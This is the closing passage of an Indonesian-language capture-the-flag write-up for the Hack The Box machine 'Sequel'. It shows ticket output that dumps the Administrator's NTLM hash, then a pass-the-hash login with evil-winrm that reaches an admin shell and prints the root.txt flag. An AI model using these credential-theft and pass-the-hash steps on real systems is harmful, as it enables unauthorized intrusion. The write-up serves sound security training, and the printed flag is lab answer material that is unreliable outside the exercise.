ServiceRealm : SEQUEL.HTB
UserName : Administrator
UserRealm : SEQUEL.HTB
StartTime : 5/9/2023 8:00:35 AM
EndTime : 5/9/2023 6:00:35 PM
RenewTill : 5/16/2023 8:00:35 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : 8OwdlbhQ/yHyrNCoiNpWRg==
ASREP (key) : 6B8E22760494930D27FC5686D231B4AA
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EESetelah mendapatkan NTLM admini kami menjalan kan evil-winrm dengan hash NTLM dan kami berhasil mendapatkan flag root.txt.
┌──(root㉿kali)-[/home/lovebird]
└─# evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
cd Desktop
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
dir
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/9/2023 7:18 AM 34 root.txt
type *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
ac1ae6882fe57ac0cd04ad22012b5115
*Evil-WinRM* PS C:\Users\Administrator\Desktop>Saya ucapkan banyak terima kasih yang sudah membaca artikel ini dan semoga bermanfaat.
